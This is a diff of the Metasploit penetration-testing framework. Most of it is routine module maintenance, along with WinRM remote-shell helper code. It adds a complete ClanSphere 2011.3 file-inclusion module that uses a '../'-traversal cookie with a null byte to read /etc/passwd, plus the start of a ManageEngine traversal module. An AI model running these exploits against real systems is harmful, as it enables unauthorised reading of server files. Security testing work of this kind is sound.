+ return [nil,nil] unless ntlm_challenge
+
+ #old and simplier method but not compatible with windows 7/2008r2
+ #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge)
+ #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true})
+ ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge)
+ blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2)
+ challenge_key = blob_data[:challenge_key]
+ server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
+ #netbios name
+ default_name = blob_data[:default_name] || ''
+ #netbios domain
+ default_domain = blob_data[:default_domain] || ''
+ #dns name
+ dns_host_name = blob_data[:dns_host_name] || ''
+ #dns domain
+ dns_domain_name = blob_data[:dns_domain_name] || ''
+ #Client time
+ chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
+ spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}
+ resp_lm,
+ resp_ntlm,
+ client_challenge,
+ ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key,
+ domain_name, default_name, default_domain,
+ dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
+ spnopt, ntlm_options)
+ ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'],
+ resp_lm, resp_ntlm, '', ntlmssp_flags)
+ ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3)
+ # Send the response
+ r = c.request_cgi(opts.merge({
+ 'uri' => opts['uri'],
+ 'method' => 'POST',
+ 'ctype' => ctype,
+ 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"},
+ 'data' => opts['data']
+ }))
+ resp = c.send_recv(r, to, true)
+ unless resp.kind_of? Rex::Proto::Http::Response
+ return [nil,nil]
+ end
+ return [nil,nil] if resp.code == 404
+ return [resp,c]
+ rescue ::Errno::EPIPE, ::Timeout::Error
+ end
+ end
+
+ def accepts_ntlm_auth
+ parse_auth_methods(winrm_poke).include? "Negotiate"
+ end
+
+ def target_url
+ proto = "http"
+ if rport == 5986 or datastore['SSL']
+ proto = "https"
+ end
+ if datastore['VHOST']
+ return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}"
+ else
+ return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
+ end
+ end
+
+ private
+
+ def winrm_option_set(options)
+ xml = "<w:OptionSet>"
+ options.each do |option_pair|
+ xml << winrm_option(*option_pair)
+ end
+ xml << "</w:OptionSet>"
+ return xml
+ end
+
+ def winrm_option(name,value)
+ %Q{<w:Option Name="#{name}">#{value}</w:Option>}
+ end
+
+ def winrm_selector_set(selectors)
+ xml = "<w:SelectorSet>"
+ selectors.each do |selector_pair|
+ xml << winrm_selector(*selector_pair)
+ end
+ xml << "</w:SelectorSet>"
+ return xml
+ end
+
+ def winrm_selector(name,value)
+ %Q{<w:Selector Name="#{name}">#{value}</w:Selector>}
+ end
+
+ def winrm_wql_body(wql)
+ %Q{
+ <env:Body>
+ <n:Enumerate>
+ <w:OptimizeEnumeration xsi:nil="true"/>
+ <w:MaxElements>32000</w:MaxElements>
+ <w:Filter Dialect="http://schemas.microsoft.com/wbem/wsman/1/WQL">#{wql}</w:Filter>
+ </n:Enumerate>
+ </env:Body>
+ }
+ end
+
+ def winrm_open_shell_body
+ %q{<env:Body>
+ <rsp:Shell>
+ <rsp:InputStreams>stdin</rsp:InputStreams>
+ <rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
+ </rsp:Shell>
+ </env:Body>}
+ end
+
+ def winrm_cmd_body(cmd)
+ %Q{ <env:Body>
+ <rsp:CommandLine>
+ <rsp:Command>&quot;#{cmd}&quot;</rsp:Command>
+ </rsp:CommandLine>
+ </env:Body>}
+ end
+
+ def winrm_cmd_recv_body(cmd_id)
+ %Q{<env:Body>
+ <rsp:Receive>
+ <rsp:DesiredStream CommandId="#{cmd_id}">stdout stderr</rsp:DesiredStream>
+ </rsp:Receive>
+ </env:Body>}
+ end
+
+ def winrm_terminate_cmd_body(cmd_id)
+ %Q{ <env:Body>
+ <rsp:Signal CommandId="#{cmd_id}">
+ <rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code>
+ </rsp:Signal>
+ </env:Body>}
+ end
+
+ def winrm_empty_body
+ %q{<env:Body/>}
+ end
+
+ def winrm_envelope(data)
+ %Q{
+ <?xml version="1.0" encoding="UTF-8"?>
+ <env:Envelope xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd"
+ xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+ xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
+ xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+ xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> #{data}</env:Envelope>
+ }
+ end
+
+ def winrm_header(data)
+ %Q{
+ <env:Header>
+ <a:To>#{target_url}</a:To>
+ <a:ReplyTo>
+ <a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+ </a:ReplyTo>
+ <w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
+ <a:MessageID>uuid:#{generate_uuid}</a:MessageID>
+ <w:Locale mustUnderstand="false" xml:lang="en-US"/>
+ <p:DataLocale mustUnderstand="false" xml:lang="en-US"/>
+ <w:OperationTimeout>PT60S</w:OperationTimeout>
+ #{data}
+ </env:Header>
+ }
+ end
+
+ def winrm_uri_action(type)
+ case type
+ when "wql"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/*</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate</a:Action>}
+ when "create_shell"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>}
+ when "send_cmd"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action>}
+ when "recv_cmd"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action>}
+ when "signal_shell"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action>}
+ when "delete_shell"
+ return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
+ <a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action>}
+ end
+ end
+
+end
+end
3  lib/msf/core/handler/bind_tcp.rb
View
@@ -127,7 +127,7 @@ def start_handler
rescue Rex::ConnectionRefused
# Connection refused is a-okay
rescue ::Exception
- wlog("Exception caught in bind handler: #{$!}")
+ wlog("Exception caught in bind handler: #{$!.class} #{$!}")
end
break if client
@@ -138,7 +138,6 @@ def start_handler
# Valid client connection?
if (client)
-
# Increment the has connection counter
self.pending_connections += 1
65 lib/msf/core/module/author.rb
View
@@ -12,38 +12,39 @@ class Msf::Module::Author
# A hash of known author names
Known =
{
- 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
- 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
- 'skape' => 'mmiller' + 0x40.chr + 'hick.org',
- 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
- 'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
- 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
- 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
- 'MC' => 'mc' + 0x40.chr + 'metasploit.com',
- 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
- 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
- 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
- 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
- 'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com',
- 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
- 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
- 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
- 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
- 'et' => 'et' + 0x40.chr + 'metasploit.com',
- 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
- 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
- 'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
- 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
- 'natron' => 'natron' + 0x40.chr + 'metasploit.com',
- 'todb' => 'todb' + 0x40.chr + 'metasploit.com',
- 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
- 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
- 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
- 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
- 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
- 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
- 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
- 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com'
+ 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
+ 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
+ 'skape' => 'mmiller' + 0x40.chr + 'hick.org',
+ 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
+ 'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
+ 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
+ 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
+ 'MC' => 'mc' + 0x40.chr + 'metasploit.com',
+ 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
+ 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
+ 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
+ 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
+ 'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
+ 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
+ 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
+ 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
+ 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
+ 'et' => 'et' + 0x40.chr + 'metasploit.com',
+ 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
+ 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
+ 'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
+ 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
+ 'natron' => 'natron' + 0x40.chr + 'metasploit.com',
+ 'todb' => 'todb' + 0x40.chr + 'metasploit.com',
+ 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
+ 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
+ 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
+ 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
+ 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
+ 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
+ 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
+ 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
+ 'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
}
#
3  lib/rex/io/stream_abstraction.rb
View
@@ -149,6 +149,9 @@ def monitor_rsock
closed = true
wlog("monitor_rsock: closed remote socket due to nil read")
end
+ rescue EOFError => e
+ closed = true
+ dlog("monitor_rsock: EOF in rsock")
rescue ::Exception => e
closed = true
wlog("monitor_rsock: exception during read: #{e.class} #{e}")
11 lib/rex/post/meterpreter/client.rb
View
@@ -154,7 +154,7 @@ def swap_sock_plain_to_ssl
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
# Use non-blocking OpenSSL operations on Windows
- if not ( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
+ if !( ssl.respond_to?(:accept_nonblock) and Rex::Compat.is_windows )
ssl.accept
else
begin
@@ -211,12 +211,19 @@ def generate_ssl_context
cert.version = 2
cert.serial = rand(0xFFFFFFFF)
+ # Depending on how the socket was created, getsockname will
+ # return either a struct sockaddr as a String (the default ruby
+ # Socket behavior) or an Array (the extend'd Rex::Socket::Tcp
+ # behavior). Avoid the ambiguity by always picking a random
+ # hostname. See #7350.
+ subject_cn = Rex::Text.rand_hostname
+
subject = OpenSSL::X509::Name.new([
["C","US"],
['ST', Rex::Text.rand_state()],
["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
- ["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname],
+ ["CN", subject_cn],
])
issuer = OpenSSL::X509::Name.new([
["C","US"],
15 lib/rex/text.rb
View
@@ -1,5 +1,6 @@
# -*- coding: binary -*-
require 'digest/md5'
+require 'digest/sha1'
require 'stringio'
begin
@@ -813,6 +814,20 @@ def self.md5(str)
end
#
+ # Raw SHA1 digest of the supplied string
+ #
+ def self.sha1_raw(str)
+ Digest::SHA1.digest(str)
+ end
+
+ #
+ # Hexidecimal SHA1 digest of the supplied string
+ #
+ def self.sha1(str)
+ Digest::SHA1.hexdigest(str)
+ end
+
+ #
# Convert hex-encoded characters to literals.
# Example: "AA\\x42CC" becomes "AABCC"
#
2  modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb
View
@@ -35,13 +35,11 @@ def initialize
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
- 'Platform' => [ 'win' ],
'References' =>
[
[ 'OSVDB', '65533'],
[ 'URL', 'http://seclists.org/bugtraq/2010/Jun/160' ]
],
- 'Privileged' => true,
'DisclosureDate' => 'Jun 15 2010'
)
2  modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
View
@@ -36,7 +36,7 @@ def initialize
[ 'OSVDB', '73447' ],
[ 'CVE', '2008-2938' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
- [ 'EDB', 17388 ],
+ [ 'EDB', '17388' ],
[ 'BID', '48225' ],
],
'Author' => [ 'patrick' ],
2  modules/auxiliary/admin/http/typo3_sa_2009_002.rb
View
@@ -32,7 +32,7 @@ def initialize(info = {})
['OSVDB', '52048'],
['CVE', '2009-0815'],
['URL', 'http://secunia.com/advisories/33829/'],
- ['EDB', 8038],
+ ['EDB', '8038'],
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],
],
'DisclosureDate' => 'Feb 10 2009',
1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
View
@@ -26,7 +26,6 @@ def initialize(info = {})
},
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ],
'License' => MSF_LICENSE,
- 'Platform' => [ 'win' ],
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
View
@@ -33,7 +33,6 @@ def initialize(info = {})
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
- 'Platform' => [ 'win' ],
'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]
))
5 modules/auxiliary/admin/officescan/tmlisten_traversal.rb
View
@@ -51,6 +51,11 @@ def run_host(target_host)
'method' => 'GET',
}, 20)
+ if not res
+ print_error("No response from server")
+ return
+ end
+
http_fingerprint({ :response => res })
if (res.code >= 200)
5 modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
View
@@ -45,7 +45,6 @@ def initialize
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
],
# Tested OK against sol8.tor 20100624 -jjd
- 'Privileged' => true,
'DisclosureDate' => 'Jan 22 2003')
register_options(
@@ -136,8 +135,8 @@ def run
sunrpc_destroy
rescue ::Rex::Proto::SunRPC::RPCTimeout
- print_status 'Warning: ' + $!
- print_status 'Exploit may or may not have succeeded.'
+ print_warning 'Warning: ' + $!
+ print_warning 'Exploit may or may not have succeeded.'
end
2  modules/auxiliary/admin/zend/java_bridge.rb
View
@@ -32,7 +32,7 @@ def initialize(info = {})
[
[ 'OSVDB', '71420'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/' ],
- [ 'EDB', 17078 ],
+ [ 'EDB', '17078' ],
],
'DisclosureDate' => 'Mar 28 2011'))
2  modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
View
@@ -37,7 +37,7 @@ def initialize
[
[ 'CVE', '2010-2156' ],
[ 'OSVDB', '65246'],
- [ 'EDB', 14185]
+ [ 'EDB', '14185']
]
)
register_options(
2  modules/auxiliary/dos/hp/data_protector_rds.rb
View
@@ -36,7 +36,7 @@ def initialize(info = {})
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
- [ 'EDB', 15940 ],
+ [ 'EDB', '15940' ],
],
'DisclosureDate' => 'Jan 8 2011' ))
2  modules/auxiliary/dos/http/apache_mod_isapi.rb
View
@@ -53,7 +53,7 @@ def initialize(info = {})
[ 'URL', 'https://issues.apache.org/bugzilla/show_bug.cgi?id=48509' ],
[ 'URL', 'http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
- [ 'EDB', 11650 ]
+ [ 'EDB', '11650' ]
],
'DisclosureDate' => 'Mar 05 2010'))
2  modules/auxiliary/dos/http/apache_range_dos.rb
View
@@ -36,7 +36,7 @@ def initialize(info = {})
[
[ 'BID', '49303'],
[ 'CVE', '2011-3192'],
- [ 'EDB', 17696],
+ [ 'EDB', '17696'],
[ 'OSVDB', '74721' ],
],
'DisclosureDate' => 'Aug 19 2011'))
2  modules/auxiliary/dos/http/sonicwall_ssl_format.rb
View
@@ -58,7 +58,7 @@ def run
'uri' => datastore['URI'] + fmt,
})
- if res.code == 200
+ if res and res.code == 200
res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
print_status("Information leaked: #{$1}")
end
1  modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
View
@@ -27,7 +27,6 @@ def initialize(info = {})
Code execution may be possible however this module is only a DoS.
},
'Author' => [ 'patrick' ],
- 'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
3  modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
View
@@ -40,10 +40,9 @@ def initialize(info = {})
[ 'OSVDB', '70167' ],
[ 'BID', '45542' ],
[ 'MSB', 'MS11-004' ],
- [ 'EDB', 15803 ],
+ [ 'EDB', '15803' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ]
],
- 'Platform' => [ 'win' ],
'DisclosureDate' => 'Dec 21 2010'))
register_options(
2  modules/auxiliary/dos/windows/ftp/solarftp_user.rb
View
@@ -34,7 +34,7 @@ def initialize(info={})
'Version' => '$Revision$',
'References' =>
[
- [ 'EDB', 16204 ],
+ [ 'EDB', '16204' ],
],
'DisclosureDate' => 'Feb 22 2011'))
2  modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
View
@@ -38,7 +38,7 @@ def initialize(info = {})
[ 'CVE', '2010-1899' ],
[ 'OSVDB', '67978'],
[ 'MSB', 'MS10-065'],
- [ 'EDB', 15167 ]
+ [ 'EDB', '15167' ]
],
'DisclosureDate' => 'Sep 14 2010'))
2  modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
View
@@ -30,7 +30,7 @@ def initialize(info = {})
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
- [ 'EDB', 18606 ],
+ [ 'EDB', '18606' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update' ]
],
'Author' =>
2  modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
View
@@ -43,7 +43,7 @@ def initialize(info = {})
[ 'BID', '46360' ],
[ 'OSVDB', '70881' ],
[ 'MSB', 'MS11-019' ],
- [ 'EDB', 16166 ],
+ [ 'EDB', '16166' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ]
],
'Author' => [ 'Cupidon-3005', 'jduck' ],
2  modules/auxiliary/dos/windows/tftp/solarwinds.rb
View
@@ -30,7 +30,7 @@ def initialize(info = {})
[
[ 'CVE', '2010-2115' ],
[ 'OSVDB', '64845' ],
- [ 'EDB', 12683 ]
+ [ 'EDB', '12683' ]
],
'DisclosureDate' => 'May 21 2010'))
2  modules/auxiliary/gather/d20pass.rb
View
@@ -31,7 +31,7 @@ def initialize(info = {})
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 1 $',
+ 'Version' => '$Revision$',
'DisclosureDate' => 'Jan 19 2012'
))
2  modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
View
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
- 'Version' => '$Revision: 13962 $',
+ 'Version' => '$Revision$',
'Description' => %q{
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
},
2  modules/auxiliary/scanner/h323/h323_version.rb
View
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'H.323 Version Scanner',
- 'Version' => '$Revision: 9804 $',
+ 'Version' => '$Revision$',
'Description' => 'Detect H.323 Version.',
'Author' => 'hdm',
'License' => MSF_LICENSE
2  modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
View
@@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to read a remote file from the server using a
vulnerability in the way Atlassian Crowd handles XML files. The vulnerability
2  modules/auxiliary/scanner/http/axis_local_file_include.rb
View
@@ -29,7 +29,7 @@ def initialize
},
'References' =>
[
- ['EDB', 12721],
+ ['EDB', '12721'],
['OSVDB', '59001'],
],
'Author' =>
2  modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
View
@@ -31,7 +31,7 @@ def initialize
[
['OSVDB', '68301'],
['URL', 'http://secunia.com/advisories/41609/'],
- ['EDB', 15130]
+ ['EDB', '15130']
],
'Author' =>
[
91 modules/auxiliary/scanner/http/clansphere_traversal.rb
View
@@ -0,0 +1,91 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ClanSphere 2011.3 Local File Inclusion Vulnerability',
+ 'Description' => %q{
+ This module exploits a directory traversal flaw found in Clansphere 2011.3.
+ The application fails to handle the cs_lang parameter properly, which can be
+ used to read any file outside the virtual directory.
+ },
+ 'References' =>
+ [
+ ['OSVDB', '86720'],
+ ['EDB', '22181']
+ ],
+ 'Author' =>
+ [
+ 'blkhtc0rp', #Original
+ 'sinn3r'
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "Oct 23 2012"
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path to the web application', '/clansphere_2011.3/']),
+ OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
+ OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
+ ], self.class)
+ end
+
+
+ def run_host(ip)
+ base = target_uri.path
+ base << '/' if base[-1,1] != '/'
+
+ peer = "#{ip}:#{rport}"
+
+ print_status("#{peer} - Reading '#{datastore['FILE']}'")
+
+ traverse = "../" * datastore['DEPTH']
+ f = datastore['FILE']
+ f = f[1, f.length] if f =~ /^\//
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{base}index.php",
+ 'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
+ })
+
+ if res and res.body =~ /^Fatal error\:/
+ print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:")
+ print_error("\t1. File does not exist.")
+ print_error("\t2. No permission.")
+ print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
+
+ elsif res and res.code == 200
+ pattern_end = " UTC +1 - Load:"
+ data = res.body.scan(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC.+/m).flatten[0].lstrip
+ fname = datastore['FILE']
+ p = store_loot(
+ 'clansphere.cms',
+ 'application/octet-stream',
+ ip,
+ data,
+ fname
+ )
+
+ vprint_line(data)
+ print_good("#{peer} - #{fname} stored as '#{p}'")
+
+ else
+ print_error("#{peer} - Fail to obtain file for some unknown reason")
+ end
+ end
+
+end
2  modules/auxiliary/scanner/http/ektron_cms400net.rb
View
@@ -67,7 +67,7 @@ def run_host(ip)
#Check for HTTP 200 response.
#Numerous versions and configs make if difficult to further fingerprint.
- if (res.code == 200)
+ if (res and res.code == 200)
print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
#Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.
2  modules/auxiliary/scanner/http/enum_wayback.rb
View
@@ -22,7 +22,7 @@ def initialize(info = {})
This module pulls and parses the URLs stored by Archive.org for the purpose of
replaying during a web assessment. Finding unlinked and old pages.
},
- 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
+ 'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
2  modules/auxiliary/scanner/http/httpbl_lookup.rb
View
@@ -23,7 +23,7 @@ def initialize(info = {})
This module can be used to enumerate information
about an IP addresses from Project HoneyPot's HTTP Block List.
},
- 'Author' => [ 'Rob Fuller <mubix[at]rapid7.com>' ],
+ 'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
2  modules/auxiliary/scanner/http/litespeed_source_disclosure.rb
View
@@ -30,7 +30,7 @@ def initialize
[ 'CVE', '2010-2333' ],
[ 'OSVDB', '65476' ],
[ 'BID', '40815' ],
- [ 'EDB', 13850 ]
+ [ 'EDB', '13850' ]
],
'Author' =>
[
2  modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
View
@@ -34,7 +34,7 @@ module will attempt to download the Majordomo config.pl file.
['CVE', '2011-0063'],
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
- ['EDB', 16103]
+ ['EDB', '16103']
],
'DisclosureDate' => 'Mar 08 2011',
'License' => MSF_LICENSE
0  .../auxiliary/scanner/http/manageengine_traversal.rb → ...anner/http/manageengine_deviceexpert_traversal.rb
View
File renamed without changes
92 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
View
@@ -0,0 +1,92 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal',
+ 'Description' => %q{
+ This module exploits a directory traversal flaw found in ManageEngine
+ SecurityManager Plus 5.5 or less. When handling a file download request,
+ the DownloadServlet class fails to properly check the 'f' parameter, which
+ can be abused to read any file outside the virtual directory.
+ },
+ 'References' =>
+ [
+ ['OSVDB', '86563'],
+ ['EDB', '22092']
+ ],
+ 'Author' =>
+ [
+ 'blkhtc0rp', #Original
+ 'sinn3r'
+ ],
